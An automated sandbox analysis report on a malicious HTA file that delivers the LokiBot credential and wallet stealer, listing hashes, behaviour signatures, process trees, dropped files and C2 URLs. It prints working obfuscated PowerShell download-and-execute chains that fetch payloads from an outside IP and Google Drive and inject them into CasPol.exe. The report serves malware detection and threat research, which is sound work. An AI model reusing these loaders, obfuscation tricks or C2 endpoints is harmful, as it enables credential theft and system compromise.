Analysis

  • max time kernel
    138s
  • max time network
    112s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-10-2024 06:01

General

  • Target

    greatwayforbestthignswithwhonotwanttodo.hta

  • Size

    130KB

  • MD5

    67a5ad5e7caf5c79cb209e433c345c0b

  • SHA1

    15776cf58dee4ecb7b42b2836539d8d553bf5439

  • SHA256

    5d06cbde318e42ef7e39a6af52d96576aec4f11477101e4c90718f12c09c5eb4

  • SHA512

    b6b697d11dca698441116526bad13c366ba78b477b7489372fff4155a3a06fc49a6487cf2e7a6e33855b7ac7c57dc0c99760a6fe54e77f2b2ec51539a6f5ee96

  • SSDEEP

    192:Ea2xJKbBKWvKbBRWGWiJnKbBxKbBDWNTKbBUT:UWSHWi0yW22

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Extracted

Family

lokibot

C2

http://94.156.177.220/simple/five/fre.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Signatures

  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Evasion via Device Credential Deployment 2 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\greatwayforbestthignswithwhonotwanttodo.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4364
    • C:\Windows\SysWOW64\WINdOwspoWErSHeLL\V1.0\powERShEll.EXe
      "C:\Windows\SySTeM32\WINdOwspoWErSHeLL\V1.0\powERShEll.EXe" "POWerSHELl.EXE -ex BYPAss -NoP -W 1 -c DeVIcecrEdeNtIalDeploYMent ; IeX($(Iex('[sysTEm.TExt.enCODINg]'+[cHaR]58+[chaR]0x3a+'UTF8.GetStRing([sYStEm.cOnvErT]'+[ChaR]0X3A+[chaR]58+'fromBaSe64sTrIng('+[CHar]34+'JEN3a1ZBMXJLTlgxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJlckRFZmlOaXRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUmxtb24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFwLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTk9rdSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFF2ZVlheCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNxSk9USUEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAidGh1RlpYIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWVTUEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEN3a1ZBMXJLTlgxOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80Mi9zaW1wbGV0aGluZ3N3aXRoZ3JlYXRmdXR1cmViZXR0ZXJvbmVnZXRiYWNrZm9ybWUudElGIiwiJEVOdjpBUFBEQVRBXHNpbXBsZXRoaW5nc3dpdGhncmVhdGZ1dHVyZWJldHRlcm9uZWdldGJhLnZicyIsMCwwKTtzdEFSVC1TTGVlUCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzaW1wbGV0aGluZ3N3aXRoZ3JlYXRmdXR1cmViZXR0ZXJvbmVnZXRiYS52YnMi'+[cHar]34+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4616
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BYPAss -NoP -W 1 -c DeVIcecrEdeNtIalDeploYMent
        3⤵
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1064
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\12vlfsbq\12vlfsbq.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2668
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9D69.tmp" "c:\Users\Admin\AppData\Local\Temp\12vlfsbq\CSC5A46B05E6EB443DE87CDF9DF8435862.TMP"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1532
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\simplethingswithgreatfuturebetteronegetba.vbs"
        3⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1472
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnZTZvaW1hZ2VVcmwgPSB6U3JodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2EnKydkJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciB6U3I7ZTZvd2ViQ2xpZW50ID0gTmV3LU9iamVjdCcrJyBTeXN0ZW0uTmV0LldlYkNsaWVudDtlNm9pbWFnZUJ5dGVzID0gZTZvd2ViQ2xpZW50LicrJ0Rvd25sb2FkRGF0YShlNm9pbWFnZVVybCk7ZTZvaW1hZ2VUJysnZXh0ID0gW1N5c3RlbS5UJysnZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoZTZvaW1hZ2VCeXRlcyk7ZTZvc3RhcnRGbGFnID0gelNyPDxCQVNFNjRfU1RBUlQ+PnpTcjtlNm9lbmRGbGFnID0gelNyPDxCQVNFNjRfRU5EPj56U3I7ZTZvc3RhcnRJbmRleCA9IGU2b2ltYWdlVGV4dC5JbmRleE9mKGU2b3N0YXJ0RmxhZyk7ZTZvJysnZW5kSW5kZXggPSBlNm9pbWFnZVRleHQuSW5kZXhPZihlNm9lbmRGbGFnKTtlNm8nKydzJysndGFydEluZGV4IC1nZSAwIC1hbmQgZTZvZW5kSW5kZXggLWd0IGU2b3N0YXJ0SW5kZXg7ZTZvc3RhcnRJbmRleCArPSBlNm9zdGFydEZsYWcuTGVuZ3RoO2U2b2Jhc2U2NExlbmd0aCA9IGU2b2VuZEluZGV4IC0gZTZvc3RhJysncnRJbmRleDtlNm9iJysnYXNlNjRDb21tYW5kID0gZTZvaScrJ21hZ2VUZXh0LlN1YnN0cmluZygnKydlNm9zdGFydEluZGV4LCBlNm9iYXNlNjRMZW5ndGgnKycpO2U2b2Jhc2U2NFJldmVyc2VkID0gLWpvaW4gKGU2b2Jhc2U2NENvbW1hbmQuVG9DaGFyQXJyYScrJ3koKSAnKydDcHcgRm9yRWFjaCcrJy1PYmplY3QgeyBlNm9fIH0pWy0xLi4tKGU2b2Jhc2U2NENvbW1hbmQnKycuTCcrJ2VuZ3RoKV07ZTZvY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhlNm9iYXNlNjRSZXZlcnNlZCk7ZTZvbG9hZGUnKydkQXNzZW1ibHkgPSBbU3lzdCcrJ2VtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2EnKydkKGU2b2NvbW1hbmRCeXRlcyk7ZTZvdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCh6U3JWQUl6U3InKycpO2U2b3ZhaU1ldGhvZC5JbnZvaycrJ2UoZTZvbnVsbCwgQCh6U3J0eHQuVkdGVkJSUy8yNC8nKycxJysnNDEuNjcnKycxLjMuMjkxLy86cCcrJ3R0aHpTciwgeicrJ1NyZGVzYXRpdmFkb3pTciwgeicrJ1NyZGUnKydzJysnYXRpdmFkb3pTciwgelNyZGVzYXRpdmEnKydkb3pTciwgelNyQ2FzUG9selNyLCB6U3JkZXNhdGl2YWRvelNyLCcrJyB6U3JkZXNhdGl2YWRvelNyLHpTcmRlc2EnKyd0aXZhZG96U3IselNyZGVzYXRpdmFkb3pTcix6U3JkZXNhdGl2JysnYScrJ2RvelNyLHpTcmRlc2F0aXZhZG96U3IselNyZGVzYXQnKydpdmFkb3pTcix6U3IxelNyLHpTcmRlc2F0aXZhZG96U3IpKScrJzsnKS1SZXBsYUNFIChbQ0hhcl0xMjIrW0NIYXJdODMrW0NIYXJdMTE0KSxbQ0hhcl0zOSAtY3JFcExhQ0UnZTZvJyxbQ0hhcl0zNi1SZXBsYUNFIChbQ0hhcl02NytbQ0hhcl0xMTIrW0NIYXJdMTE5KSxbQ0hhcl0xMjQpIHwmICggJHBTaE9tZVsyMV0rJHBzSE9tZVszNF0rJ3gnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4440
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('e6oimageUrl = zSrhttps://drive.google.com/uc?export=downloa'+'d&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur zSr;e6owebClient = New-Object'+' System.Net.WebClient;e6oimageBytes = e6owebClient.'+'DownloadData(e6oimageUrl);e6oimageT'+'ext = [System.T'+'ext.Encoding]::UTF8.GetString(e6oimageBytes);e6ostartFlag = zSr<<BASE64_START>>zSr;e6oendFlag = zSr<<BASE64_END>>zSr;e6ostartIndex = e6oimageText.IndexOf(e6ostartFlag);e6o'+'endIndex = e6oimageText.IndexOf(e6oendFlag);e6o'+'s'+'tartIndex -ge 0 -and e6oendIndex -gt e6ostartIndex;e6ostartIndex += e6ostartFlag.Length;e6obase64Length = e6oendIndex - e6osta'+'rtIndex;e6ob'+'ase64Command = e6oi'+'mageText.Substring('+'e6ostartIndex, e6obase64Length'+');e6obase64Reversed = -join (e6obase64Command.ToCharArra'+'y() '+'Cpw ForEach'+'-Object { e6o_ })[-1..-(e6obase64Command'+'.L'+'ength)];e6ocommandBytes = [System.Convert]::FromBase64String(e6obase64Reversed);e6oloade'+'dAssembly = [Syst'+'em.Reflection.Assembly]::Loa'+'d(e6ocommandBytes);e6ovaiMethod = [dnlib.IO.Home].GetMethod(zSrVAIzSr'+');e6ovaiMethod.Invok'+'e(e6onull, @(zSrtxt.VGFVBRS/24/'+'1'+'41.67'+'1.3.291//:p'+'tthzSr, z'+'SrdesativadozSr, z'+'Srde'+'s'+'ativadozSr, zSrdesativa'+'dozSr, zSrCasPolzSr, zSrdesativadozSr,'+' zSrdesativadozSr,zSrdesa'+'tivadozSr,zSrdesativadozSr,zSrdesativ'+'a'+'dozSr,zSrdesativadozSr,zSrdesat'+'ivadozSr,zSr1zSr,zSrdesativadozSr))'+';')-ReplaCE ([CHar]122+[CHar]83+[CHar]114),[CHar]39 -crEpLaCE'e6o',[CHar]36-ReplaCE ([CHar]67+[CHar]112+[CHar]119),[CHar]124) |& ( $pShOme[21]+$psHOme[34]+'x')"
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3520
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
              6⤵
              • Accesses Microsoft Outlook profiles
              • Suspicious use of AdjustPrivilegeToken
              • outlook_office_path
              • outlook_win_path
              PID:4504

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powERShEll.EXe.log

    Filesize

    2KB

    MD5

    968cb9309758126772781b83adb8a28f

    SHA1

    8da30e71accf186b2ba11da1797cf67f8f78b47c

    SHA256

    92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

    SHA512

    4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    12KB

    MD5

    af2ffd66ac8da2e1a09b817587ec1954

    SHA1

    eb2744039f42ecc1872f72350c6e98ee912b441f

    SHA256

    c892680b4030dd8021429431424d71e9d847e7d35c8255317b0c918361f8df3f

    SHA512

    7b362fdb84c781b8c8082dbe2925c32f212da5e94e384cafcb4560a2bf8ce9c8430a2f22a9a3caacf6d0e56a04195890de7ab9335b59495291516693d83ec8f9

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    18KB

    MD5

    7e57d1477c58799dff146ee9451bc597

    SHA1

    30fb23839b5dae0551d014509ddc304c8ad4571e

    SHA256

    ab40712f973af6a000f552064ed3187e226cc12ac9009f2537cde827f3035047

    SHA512

    00b5136c12c9cbeb6dd5f25fa5315e61c10910dd95a3ee25ae454e6ae86438bdeccffc3a00d3ce810eba9cc598d6f9bd73e298bf4acede0bc9f250086912d5a5

  • C:\Users\Admin\AppData\Local\Temp\12vlfsbq\12vlfsbq.dll

    Filesize

    3KB

    MD5

    3b6a8357ea4a7d6e94a5f2c521b7cd65

    SHA1

    39f7cd9d04b84c556ec9a713ecdfb15ac37683b1

    SHA256

    7e4ca29585d73d1fb0377a48a0013fdc1935bb29b088285fd4b90ea10d86403b

    SHA512

    dddedd873c2c065f1393aecbaae887e5cd5f9283e243ac1717e9ed00644d36a6319890618bc32d6a46be3939709a6c127ae78b02501cc4bba7fdd0d37d174618

  • C:\Users\Admin\AppData\Local\Temp\RES9D69.tmp

    Filesize

    1KB

    MD5

    3cabf15ec9a86fb72216aa06647b9f26

    SHA1

    57895d51d81cf373731179b81cdae3b12b1afae6

    SHA256

    3fd47aae3da17ab61129db062f00b8724171938a3f6ba948bdafad254c4d8bec

    SHA512

    2f121b7ed42338121251df16a8bc5b8cdf8892c3dba3b162fedb76eb23f39c58530a38113aef66bcdced62f02e6ccc7c575e311097f305c3a61cc1ff06ed732a

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_l5ns4cvq.gvq.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2437139445-1151884604-3026847218-1000\0f5007522459c86e95ffcc62f32308f1_4304acb9-c3f6-452a-9860-eb4e85d38d4e

    Filesize

    46B

    MD5

    d898504a722bff1524134c6ab6a5eaa5

    SHA1

    e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

    SHA256

    878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

    SHA512

    26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2437139445-1151884604-3026847218-1000\0f5007522459c86e95ffcc62f32308f1_4304acb9-c3f6-452a-9860-eb4e85d38d4e

    Filesize

    46B

    MD5

    c07225d4e7d01d31042965f048728a0a

    SHA1

    69d70b340fd9f44c89adb9a2278df84faa9906b7

    SHA256

    8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

    SHA512

    23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

  • C:\Users\Admin\AppData\Roaming\simplethingswithgreatfuturebetteronegetba.vbs

    Filesize

    137KB

    MD5

    5a9b34ae3fd1ec59f9be56049cdbc50a

    SHA1

    9a32f9c0054525e2cb7693df834748f8d2960f97

    SHA256

    dadfc399131b08b48b3b2fbcabbcced43397183a41f9213ca046db03258aa3e3

    SHA512

    d951e1def250c743f06e1c6e83a837c43457ce37101ef93db5416efb52db8e49b2ab4998489b2b51dd135d04e4e661bf529c5f5da3b1915358dbfc1959d9ec93

  • \??\c:\Users\Admin\AppData\Local\Temp\12vlfsbq\12vlfsbq.0.cs

    Filesize

    459B

    MD5

    215ff4cb51532af3e78a4f759fc9aa11

    SHA1

    93b2983039e8a5ca1f4fba93f4d239e48ca38b94

    SHA256

    182126a701d9770a97367ac204a3e73a1011c253bc8ec5b83b72fac429595641

    SHA512

    72194a7d39a43d0bc2fbac563b102b28c942cc561e631e35f8324ca54d8d775c529b22eba6655f5fdb65d367e3a864ecc371423e1c2c7e7b62a8b8f7c191fd97

  • \??\c:\Users\Admin\AppData\Local\Temp\12vlfsbq\12vlfsbq.cmdline

    Filesize

    369B

    MD5

    d1379fdcfca781529852b294e20da01e

    SHA1

    b4689e33f3aa4cfca397f228d1a1532254540b8f

    SHA256

    1198b68ecca9ec910455118ff725cf4e8ead6ce46e8157ec18a235644573ce1e

    SHA512

    420bef0cad9666b1f69ef23977af2f65b4daacf552eac9e5cbdf1ab548faac42514dc2beab3575e340dbe2ce2b9a49c34b704b80318494bd72e41ea808321c18

  • \??\c:\Users\Admin\AppData\Local\Temp\12vlfsbq\CSC5A46B05E6EB443DE87CDF9DF8435862.TMP

    Filesize

    652B

    MD5

    471c1826ea0a0e91241f21364c744a5b

    SHA1

    73dffc5b9af6ddff9d86cc1f9b5f6c1fc1ef52da

    SHA256

    9837a650c652755bc0d73da24b4abdbddfcfb0efa5ccbf83be2a27023af84510

    SHA512

    fbe1623fc26c33d2ab5145afff09452171b2fe4edde9ae6520fb3a186da3155ce92ab555b3990a036462d0b588c3d68da8a3c6cdf8ff668e72459873253881e0

  • memory/1064-29-0x00000000068A0000-0x00000000068D2000-memory.dmp

    Filesize

    200KB

  • memory/1064-30-0x000000006DD30000-0x000000006DD7C000-memory.dmp

    Filesize

    304KB

  • memory/1064-40-0x0000000006860000-0x000000000687E000-memory.dmp

    Filesize

    120KB

  • memory/1064-41-0x0000000007530000-0x00000000075D3000-memory.dmp

    Filesize

    652KB

  • memory/1064-42-0x0000000007C60000-0x00000000082DA000-memory.dmp

    Filesize

    6.5MB

  • memory/1064-43-0x0000000007600000-0x000000000761A000-memory.dmp

    Filesize

    104KB

  • memory/1064-44-0x0000000007660000-0x000000000766A000-memory.dmp

    Filesize

    40KB

  • memory/1064-45-0x0000000007890000-0x0000000007926000-memory.dmp

    Filesize

    600KB

  • memory/1064-46-0x0000000007800000-0x0000000007811000-memory.dmp

    Filesize

    68KB

  • memory/1064-47-0x0000000007830000-0x000000000783E000-memory.dmp

    Filesize

    56KB

  • memory/1064-48-0x0000000007840000-0x0000000007854000-memory.dmp

    Filesize

    80KB

  • memory/1064-49-0x0000000007950000-0x000000000796A000-memory.dmp

    Filesize

    104KB

  • memory/1064-50-0x0000000007880000-0x0000000007888000-memory.dmp

    Filesize

    32KB

  • memory/3520-102-0x0000000007510000-0x000000000766A000-memory.dmp

    Filesize

    1.4MB

  • memory/3520-103-0x0000000007670000-0x000000000770C000-memory.dmp

    Filesize

    624KB

  • memory/4440-91-0x0000000005C60000-0x0000000005FB4000-memory.dmp

    Filesize

    3.3MB

  • memory/4504-138-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/4504-130-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/4504-105-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/4504-106-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/4616-71-0x000000007147E000-0x000000007147F000-memory.dmp

    Filesize

    4KB

  • memory/4616-19-0x0000000005C70000-0x0000000005CBC000-memory.dmp

    Filesize

    304KB

  • memory/4616-74-0x0000000007EB0000-0x0000000008454000-memory.dmp

    Filesize

    5.6MB

  • memory/4616-7-0x0000000004F80000-0x0000000004FE6000-memory.dmp

    Filesize

    408KB

  • memory/4616-5-0x0000000004D70000-0x0000000004D92000-memory.dmp

    Filesize

    136KB

  • memory/4616-4-0x0000000071470000-0x0000000071C20000-memory.dmp

    Filesize

    7.7MB

  • memory/4616-81-0x0000000071470000-0x0000000071C20000-memory.dmp

    Filesize

    7.7MB

  • memory/4616-72-0x0000000071470000-0x0000000071C20000-memory.dmp

    Filesize

    7.7MB

  • memory/4616-0-0x000000007147E000-0x000000007147F000-memory.dmp

    Filesize

    4KB

  • memory/4616-73-0x0000000006FF0000-0x0000000007012000-memory.dmp

    Filesize

    136KB

  • memory/4616-6-0x0000000004F10000-0x0000000004F76000-memory.dmp

    Filesize

    408KB

  • memory/4616-65-0x00000000061E0000-0x00000000061E8000-memory.dmp

    Filesize

    32KB

  • memory/4616-3-0x0000000005040000-0x0000000005668000-memory.dmp

    Filesize

    6.2MB

  • memory/4616-2-0x0000000071470000-0x0000000071C20000-memory.dmp

    Filesize

    7.7MB

  • memory/4616-1-0x0000000002300000-0x0000000002336000-memory.dmp

    Filesize

    216KB

  • memory/4616-17-0x0000000005840000-0x0000000005B94000-memory.dmp

    Filesize

    3.3MB

  • memory/4616-18-0x0000000005C20000-0x0000000005C3E000-memory.dmp

    Filesize

    120KB